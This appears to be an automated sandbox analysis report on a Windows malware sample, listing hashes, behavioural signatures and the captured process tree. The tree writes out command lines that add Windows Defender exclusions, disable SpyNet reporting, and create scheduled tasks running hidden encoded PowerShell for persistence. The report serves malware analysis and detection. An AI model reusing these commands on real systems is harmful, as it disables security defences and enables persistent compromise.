Analysis
-
max time kernel
144s -
max time network
185s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
04/12/2022, 12:55
Static task
static1
Behavioral task
behavioral1
Sample
395b6a08c66ac5c26db8a19461fa440e09dd730c46e3b2d62f4d78b1eabdd82b.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
395b6a08c66ac5c26db8a19461fa440e09dd730c46e3b2d62f4d78b1eabdd82b.exe
Resource
win10v2004-20221111-en
General
-
Target
395b6a08c66ac5c26db8a19461fa440e09dd730c46e3b2d62f4d78b1eabdd82b.exe
-
Size
7.3MB
-
MD5
61de999f1862b283214880b3902a9ec2
-
SHA1
9a307cdf80c9167add439f7030fc3cf471d52434
-
SHA256
395b6a08c66ac5c26db8a19461fa440e09dd730c46e3b2d62f4d78b1eabdd82b
-
SHA512
20abb7359e740cd415daf2f2a201ecca7e0059d7bd7cf97ac36be225a83f30be36f2f6a59a7468586932db902944c9dcefacc63877bb1f34060674fed3b8259c
-
SSDEEP
196608:91Og37vsagYxWwiWWdy0fzzb4LV7u2QJPCYDpI+:3OgrvBgY8wIdTzzoVq2WXlv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 2216 Install.exe 632 Install.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation Install.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\bPrDBHUsiCyMJfmTfV.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1396 schtasks.exe 4984 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3912 powershell.EXE 3912 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3912 powershell.EXE -
Suspicious use of WriteProcessMemory 44 IoCs
description pid Process procid_target PID 4604 wrote to memory of 2216 4604 395b6a08c66ac5c26db8a19461fa440e09dd730c46e3b2d62f4d78b1eabdd82b.exe 82 PID 4604 wrote to memory of 2216 4604 395b6a08c66ac5c26db8a19461fa440e09dd730c46e3b2d62f4d78b1eabdd82b.exe 82 PID 4604 wrote to memory of 2216 4604 395b6a08c66ac5c26db8a19461fa440e09dd730c46e3b2d62f4d78b1eabdd82b.exe 82 PID 2216 wrote to memory of 632 2216 Install.exe 84 PID 2216 wrote to memory of 632 2216 Install.exe 84 PID 2216 wrote to memory of 632 2216 Install.exe 84 PID 632 wrote to memory of 4664 632 Install.exe 88 PID 632 wrote to memory of 4664 632 Install.exe 88 PID 632 wrote to memory of 4664 632 Install.exe 88 PID 632 wrote to memory of 4092 632 Install.exe 90 PID 632 wrote to memory of 4092 632 Install.exe 90 PID 632 wrote to memory of 4092 632 Install.exe 90 PID 4092 wrote to memory of 3060 4092 forfiles.exe 92 PID 4092 wrote to memory of 3060 4092 forfiles.exe 92 PID 4092 wrote to memory of 3060 4092 forfiles.exe 92 PID 4664 wrote to memory of 3924 4664 forfiles.exe 93 PID 4664 wrote to memory of 3924 4664 forfiles.exe 93 PID 4664 wrote to memory of 3924 4664 forfiles.exe 93 PID 3924 wrote to memory of 4272 3924 cmd.exe 94 PID 3924 wrote to memory of 4272 3924 cmd.exe 94 PID 3924 wrote to memory of 4272 3924 cmd.exe 94 PID 3060 wrote to memory of 4004 3060 cmd.exe 95 PID 3060 wrote to memory of 4004 3060 cmd.exe 95 PID 3060 wrote to memory of 4004 3060 cmd.exe 95 PID 3924 wrote to memory of 3668 3924 cmd.exe 97 PID 3924 wrote to memory of 3668 3924 cmd.exe 97 PID 3924 wrote to memory of 3668 3924 cmd.exe 97 PID 3060 wrote to memory of 2424 3060 cmd.exe 96 PID 3060 wrote to memory of 2424 3060 cmd.exe 96 PID 3060 wrote to memory of 2424 3060 cmd.exe 96 PID 632 wrote to memory of 1396 632 Install.exe 98 PID 632 wrote to memory of 1396 632 Install.exe 98 PID 632 wrote to memory of 1396 632 Install.exe 98 PID 632 wrote to memory of 3148 632 Install.exe 101 PID 632 wrote to memory of 3148 632 Install.exe 101 PID 632 wrote to memory of 3148 632 Install.exe 101 PID 3912 wrote to memory of 4536 3912 powershell.EXE 109 PID 3912 wrote to memory of 4536 3912 powershell.EXE 109 PID 632 wrote to memory of 4868 632 Install.exe 115 PID 632 wrote to memory of 4868 632 Install.exe 115 PID 632 wrote to memory of 4868 632 Install.exe 115 PID 632 wrote to memory of 4984 632 Install.exe 117 PID 632 wrote to memory of 4984 632 Install.exe 117 PID 632 wrote to memory of 4984 632 Install.exe 117
Processes
-
C:\Users\Admin\AppData\Local\Temp\395b6a08c66ac5c26db8a19461fa440e09dd730c46e3b2d62f4d78b1eabdd82b.exe"C:\Users\Admin\AppData\Local\Temp\395b6a08c66ac5c26db8a19461fa440e09dd730c46e3b2d62f4d78b1eabdd82b.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Users\Admin\AppData\Local\Temp\7zS1C61.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Users\Admin\AppData\Local\Temp\7zS278D.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:632 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4664 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:3924 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:4272
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:3668
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:3060 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:4004
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2424
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gvYGaiYvB" /SC once /ST 05:44:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1396
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gvYGaiYvB"4⤵PID:3148
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gvYGaiYvB"4⤵PID:4868
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bPrDBHUsiCyMJfmTfV" /SC once /ST 13:59:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\fzbxnmJSHxNFgkceO\ZSmEqdhFiOLcuAl\aWXJOpz.exe\" cZ /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4984
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4536
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3520
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3736
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2060
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.3MB
MD50f08895fb9b9c4569eec3125305e9538
SHA14ca2a918dc913b8452070338188f58754f09994f
SHA256406a32dc2c381e780cfface1ad825ed303767d5ffe8bae69d8eb26df9b791ee5
SHA512a67b4d7beb12a45b5e30188b98413f4ca8e1df6fb38a75df48e6adc36b08c71020594393c8e0270cf5f0fba11a1b7d78881dadb5102dc28e75f5a889ea845744
-
Filesize
6.3MB
MD50f08895fb9b9c4569eec3125305e9538
SHA14ca2a918dc913b8452070338188f58754f09994f
SHA256406a32dc2c381e780cfface1ad825ed303767d5ffe8bae69d8eb26df9b791ee5
SHA512a67b4d7beb12a45b5e30188b98413f4ca8e1df6fb38a75df48e6adc36b08c71020594393c8e0270cf5f0fba11a1b7d78881dadb5102dc28e75f5a889ea845744
-
Filesize
6.9MB
MD5994f958a62e5ef7ace45bb6e5096e302
SHA1d02aab11466b959a464a35a62e1112af0d31e257
SHA256c75481e9a69780c280f00ceb34d492d3538cec727a5bccc12122c83598bc3178
SHA512e75543507fb46dfa77b082d207a35f71f19ee35d7fe58a8f21c82efb6a0fb4b3a3b333ee467a9ff97d3eb8381b337e01b37ef428bcbf56ec51161811a7a9f1ab
-
Filesize
6.9MB
MD5994f958a62e5ef7ace45bb6e5096e302
SHA1d02aab11466b959a464a35a62e1112af0d31e257
SHA256c75481e9a69780c280f00ceb34d492d3538cec727a5bccc12122c83598bc3178
SHA512e75543507fb46dfa77b082d207a35f71f19ee35d7fe58a8f21c82efb6a0fb4b3a3b333ee467a9ff97d3eb8381b337e01b37ef428bcbf56ec51161811a7a9f1ab